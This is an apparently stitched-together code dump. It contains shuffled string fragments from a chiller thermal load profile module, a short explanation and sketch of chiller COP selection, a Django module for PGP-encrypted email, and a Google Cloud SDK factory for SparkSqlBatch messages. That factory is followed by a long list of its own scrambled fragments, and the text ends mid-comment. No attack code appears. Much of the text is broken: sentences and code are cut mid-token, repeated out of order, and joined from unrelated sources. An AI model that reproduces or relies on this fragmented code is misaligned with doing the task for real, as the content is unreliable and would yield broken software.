"(float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int)",
"user supplies a list of doe_reference_names and percent shares # for consistency we",
"year # Default electric_load_list to None, used later to see if we need",
"l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar =",
"not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] =",
":param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param latitude: (float)",
"(array) electric LoadProfile object resulting from parsed inputs :param latitude: (float) site latitude",
"percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads']",
"based on CRB defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'),",
"not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series",
"max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can be accessible in",
"max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units of kWth",
"* max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self,",
"[i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is not None:",
"self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to",
"of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop for i in",
"static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list),",
"total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load",
"will be added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs",
"not None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt",
"(kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected",
"time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to which this",
"a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] =",
"class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load shapes or",
"kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour']",
"Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor",
"1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list",
"act as if we had scaled the partial load to the total site"
] |
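
The tiered COP default above is easier to see in isolation. Below is a minimal, self-contained sketch of the same selection rule; TONHOUR_TO_KWHT is assumed to be 3.51685 (one ton of cooling = 12,000 BTU/h), and the constant and function names here are illustrative stand-ins for the class attributes, not the REopt module itself.

# Minimal sketch of the COP-selection rule; stands alone, no REopt imports.
TONHOUR_TO_KWHT = 3.51685  # assumed: 1 ton of cooling = 12,000 BTU/h = 3.51685 kW thermal

COP_DEFAULTS = {"convert_elec_to_thermal": 4.55,
                "less_than_100_tons": 4.40,
                "greater_than_100_tons": 4.69}

def default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None):
    # Express the peak load in tons, whichever unit the caller supplied.
    if max_ton is not None:
        tons = max_ton
    elif max_kwt is not None:
        tons = max_kwt / TONHOUR_TO_KWHT
    elif max_kw is not None:
        # An electric peak is first converted to thermal with the nominal COP.
        tons = max_kw / TONHOUR_TO_KWHT * COP_DEFAULTS["convert_elec_to_thermal"]
    else:
        raise ValueError("supply max_ton, max_kwt or max_kw")
    # Oversize by the thermal factor, then pick the COP tier by capacity.
    if tons * max_thermal_factor_on_peak_load < 100.0:
        return COP_DEFAULTS["less_than_100_tons"]
    return COP_DEFAULTS["greater_than_100_tons"]

# A 300 kW electric peak with a 1.25 sizing factor lands in the >100-ton tier.
print(default_cop(1.25, max_kw=300.0))  # -> 4.69

Converting every input to tons before comparing keeps the 100-ton threshold test in a single unit, which is why the method normalizes first and branches last.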

# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:expandtab
# Copyright 2017 juga (juga at riseup dot net), under MIT license.
"""Extend Django email classes for MIME multipart/pgp-encrypted
type messages.
"""
__all__ = ['EmailMessageEnc', 'EmailMessagePGP']

from django.conf import settings
from django.core.mail.message import (
    EmailMessage, MIMEMixin, forbid_multi_line_headers,
    force_text, make_msgid, formatdate, DNS_NAME)

from emailpgp.mime.multipartpgp import MIMEMultipartPGP

from autocrypt.pgpymessage import gen_ac_header_dict


class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP):

    def __init__(self, _data=None, _subtype='encrypted', boundary=None,
                 encoding=None, **_params):
        self.encoding = encoding
        MIMEMultipartPGP.__init__(self, _data, boundary, **_params)

    def __setitem__(self, name, val):
        name, val = forbid_multi_line_headers(name, val, self.encoding)
        MIMEMultipartPGP.__setitem__(self, name, val)


class EmailMessageEnc(EmailMessage):

    def message(self, msg):
        self.msg = msg


class EmailMessagePGP(EmailMessage):
    """A container for encrypted email information."""
    content_subtype = 'encrypted'
    mixed_subtype = ''

    def message(self):
        encoding = self.encoding or settings.DEFAULT_CHARSET
        msg = MIMEMultipartPGP(self.body)
        # FIXME: attachments
        # msg = self._create_message(msg)
        msg['Subject'] = self.subject
        msg['From'] = self.extra_headers.get('From', self.from_email)
        msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to)))
        if self.cc:
            msg['Cc'] = ', '.join(map(force_text, self.cc))
        if self.reply_to:
            msg['Reply-To'] = self.extra_headers.get(
                'Reply-To', ', '.join(map(force_text, self.reply_to)))

        # Email header names are case-insensitive (RFC 2045), so we have to
        # accommodate that when doing comparisons.
        header_names = [key.lower() for key in self.extra_headers]
        if 'date' not in header_names:
            # formatdate() uses stdlib methods to format the date, which use
            # the stdlib/OS concept of a timezone, however, Django sets the
            # TZ environment variable based on the TIME_ZONE setting which
            # will get picked up by formatdate().
            msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME)
        if 'message-id' not in header_names:
            # Use cached DNS_NAME for performance
            msg['Message-ID'] = make_msgid(domain=DNS_NAME)
        for name, value in self.extra_headers.items():
            # From and To are already handled
            if name.lower() in ('from', 'to'):
                continue
            msg[name] = value
        return msg


class EmailMessagePGPAC(EmailMessagePGP):

    def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
                 connection=None, attachments=None, headers=None, cc=None,
                 reply_to=None, keydata=None, pe=None):
        super(EmailMessagePGPAC, self).__init__(
            subject, body, from_email, to, bcc, connection, attachments,
            headers, cc, reply_to)
        self.extra_headers.update(gen_ac_header_dict(to, keydata, pe))
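
One detail in message() worth calling out is the case-insensitive header bookkeeping: defaults such as Date and Message-ID are only added when the caller has not already supplied them under any casing. The sketch below reproduces just that pattern with nothing but the standard library; build_headers is a hypothetical helper invented for illustration, not part of the module above.

from email.utils import formatdate, make_msgid

def build_headers(extra_headers):
    """Merge caller-supplied headers with defaults, comparing names
    case-insensitively as RFC 2045 requires (illustrative helper)."""
    msg = {}
    header_names = [key.lower() for key in extra_headers]
    if 'date' not in header_names:
        msg['Date'] = formatdate(localtime=True)
    if 'message-id' not in header_names:
        msg['Message-ID'] = make_msgid()
    for name, value in extra_headers.items():
        msg[name] = value
    return msg

# 'DATE' is recognized despite the casing, so no duplicate Date is added.
print(build_headers({'DATE': 'Mon, 01 Jan 2024 00:00:00 -0000'}))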

# -*- coding: utf-8 -*-
#
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory class for SparkSqlBatch message."""

from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals

from apitools.base.py import encoding
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.dataproc import local_file_uploader


class SparkSqlBatchFactory(object):
  """Factory class for SparkSqlBatch message."""

  def __init__(self, dataproc):
    """Factory class for SparkSqlBatch message.

    Args:
      dataproc: A Dataproc instance.
    """
    self.dataproc = dataproc

  def UploadLocalFilesAndGetMessage(self, args):
    """Uploads local files and creates a SparkSqlBatch message.

    Uploads user local files and changes the URIs of local files to
    uploaded URIs. Creates a SparkSqlBatch message.

    Args:
      args: Parsed arguments.

    Returns:
      A SparkSqlBatch message instance.

    Raises:
      AttributeError: Bucket is required to upload local files, but not
      specified.
    """
    kwargs = {}

    dependencies = {}

    # Upload requires a list.
    dependencies['queryFileUri'] = [args.SQL_SCRIPT]

    if args.jar_files:
      dependencies['jarFileUris'] = args.jar_files
    if args.jars:
      dependencies['jarFileUris'] = args.jars

    params = None
    if args.script_variables:
      params = args.script_variables
    elif args.vars:
      params = args.vars
    if params:
      kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage(
          params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue,
          sort_items=True)

    if local_file_uploader.HasLocalFiles(dependencies):
      bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket
      if not bucket:
        raise AttributeError('--deps-bucket was not specified.')
      dependencies = local_file_uploader.Upload(bucket, dependencies)

    # Move main SQL script out of the list.
    dependencies['queryFileUri'] = dependencies['queryFileUri'][0]

    # Merge the dictionaries first for compatibility.
    kwargs.update(dependencies)

    return self.dataproc.messages.SparkSqlBatch(**kwargs)


def AddArguments(parser):
  flags.AddMainSqlScript(parser)
  flags.AddJarFiles(parser)
  flags.AddSqlScriptVariables(parser)
  # Cloud Storage bucket to upload workload dependencies.
  # It is required until we figure out a place to
"def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies.",
"(the \"License\"); # you may not use this file except in compliance with",
"\"\"\" kwargs = {} dependencies = {} # Upload requires a list. dependencies['queryFileUri']",
"# Unless required by applicable law or agreed to in writing, software #",
"by applicable law or agreed to in writing, software # distributed under the",
"is required until we figure out a place to upload user files. flags.AddBucket(parser)",
"language governing permissions and # limitations under the License. \"\"\"Factory class for SparkSqlBatch",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"\"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message.",
"dependencies) # Move main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0]",
"= None if args.script_variables: params = args.script_variables elif args.vars: params = args.vars if",
"file except in compliance with the License. # You may obtain a copy",
"and # limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__",
"args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue,",
"= local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the list. dependencies['queryFileUri']",
"and creates a SparkSqlBatch message. Uploads user local files and change the URIs",
"License for the specific language governing permissions and # limitations under the License.",
"= {} dependencies = {} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT]",
"to in writing, software # distributed under the License is distributed on an",
"dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the list.",
"import absolute_import from __future__ import division from __future__ import unicode_literals from apitools.base.py import",
"kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket",
"Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version",
"implied. # See the License for the specific language governing permissions and #",
"a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises:",
"\"License\"); # you may not use this file except in compliance with the",
"= args.jars params = None if args.script_variables: params = args.script_variables elif args.vars: params",
"Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is",
"Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"required to upload local files, but not specified. \"\"\" kwargs = {} dependencies",
"params = None if args.script_variables: params = args.script_variables elif args.vars: params = args.vars",
"requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars:",
"class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args:",
"or implied. # See the License for the specific language governing permissions and",
"Storage bucket to upload workload dependencies. # It is required until we figure",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import division from __future__",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc:",
"flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def",
"googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud",
"__future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc",
"args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies)",
"files, but not specified. \"\"\" kwargs = {} dependencies = {} # Upload",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"files and creates a SparkSqlBatch message. Uploads user local files and change the",
"you may not use this file except in compliance with the License. #",
"Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to",
"use this file except in compliance with the License. # You may obtain",
"args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if",
"AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. #",
"AttributeError: Bucket is required to upload local files, but not specified. \"\"\" kwargs",
"script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first",
"for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"# limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import",
"import division from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import",
"return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload",
"dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc",
"Cloud Storage bucket to upload workload dependencies. # It is required until we",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"\"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc =",
"params = args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage(",
"coding: utf-8 -*- # # Copyright 2021 Google LLC. All Rights Reserved. #",
"# It is required until we figure out a place to upload user",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.')",
"instance. Raises: AttributeError: Bucket is required to upload local files, but not specified.",
"# # Unless required by applicable law or agreed to in writing, software",
"__init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\"",
"specific language governing permissions and # limitations under the License. \"\"\"Factory class for",
"class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for",
"local files, but not specified. \"\"\" kwargs = {} dependencies = {} #",
"express or implied. # See the License for the specific language governing permissions",
"from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class",
"= dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def",
"kwargs = {} dependencies = {} # Upload requires a list. dependencies['queryFileUri'] =",
"out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for",
"dependencies. # It is required until we figure out a place to upload",
"args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params =",
"permissions and # limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from",
"either express or implied. # See the License for the specific language governing",
"not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc",
"flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. # It is",
"to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A",
"SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to upload local files, but",
"the License. # You may obtain a copy of the License at #",
"local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket if not",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. # It",
"absolute_import from __future__ import division from __future__ import unicode_literals from apitools.base.py import encoding",
"def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance.",
"= args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params",
"__future__ import division from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc",
"apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object):",
"\"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import division",
"{} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] =",
"{} dependencies = {} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if",
"with the License. # You may obtain a copy of the License at",
"to local files to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"-*- coding: utf-8 -*- # # Copyright 2021 Google LLC. All Rights Reserved.",
"import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory",
"instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates",
"sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket",
"a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris']",
"dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params = args.script_variables elif args.vars:",
"args.deps_bucket is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not",
"law or agreed to in writing, software # distributed under the License is",
"Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if",
"the License for the specific language governing permissions and # limitations under the",
"dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars",
"flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. # It is required",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"# Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files",
"dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads",
"main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the",
"not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move",
"message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args):",
"if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params = args.script_variables",
"Raises: AttributeError: Bucket is required to upload local files, but not specified. \"\"\"",
"from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from",
"Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"args.jars params = None if args.script_variables: params = args.script_variables elif args.vars: params =",
"in compliance with the License. # You may obtain a copy of the",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"is required to upload local files, but not specified. \"\"\" kwargs = {}",
"from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"Uploads user local files and change the URIs to local files to uploaded",
"Move main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge",
"specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the",
"unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"= encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"= [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"args.script_variables: params = args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] =",
"under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from",
"dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser):",
"self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else",
"URIs to local files to uploaded URIs. Creates a SparkSqlBatch message. Args: args:",
"\"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads user local files and",
"class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import division from",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required",
"list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return",
"# Copyright 2021 Google LLC. All Rights Reserved. # # Licensed under the",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True)",
"the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__",
"if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket if",
"kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to",
"It is required until we figure out a place to upload user files.",
"files to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns:",
"message. Uploads user local files and change the URIs to local files to",
"Bucket is required to upload local files, but not specified. \"\"\" kwargs =",
"None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies =",
"to upload local files, but not specified. \"\"\" kwargs = {} dependencies =",
"Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads",
"= args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params,",
"A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to upload local files,",
"files and change the URIs to local files to uploaded URIs. Creates a",
"dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables:",
"License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import",
"A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files",
"None if args.script_variables: params = args.script_variables elif args.vars: params = args.vars if params:",
"def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads user",
"change the URIs to local files to uploaded URIs. Creates a SparkSqlBatch message.",
"Copyright 2021 Google LLC. All Rights Reserved. # # Licensed under the Apache",
"and change the URIs to local files to uploaded URIs. Creates a SparkSqlBatch",
"for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def",
"uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch",
"params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None",
"Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and",
"governing permissions and # limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\"",
"if args.deps_bucket is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message",
"else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket,",
"args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params = args.script_variables elif",
"= args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket",
"if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None",
"# Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser)"
] |
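# ---------------------------------------------------------------------------
# A minimal usage sketch for SparkSqlBatchFactory above. Everything here is a
# hypothetical stand-in: the namespace fields mirror the attributes the
# factory reads (SQL_SCRIPT, jar_files, jars, script_variables, vars,
# deps_bucket, bucket), the values are invented for illustration, and the
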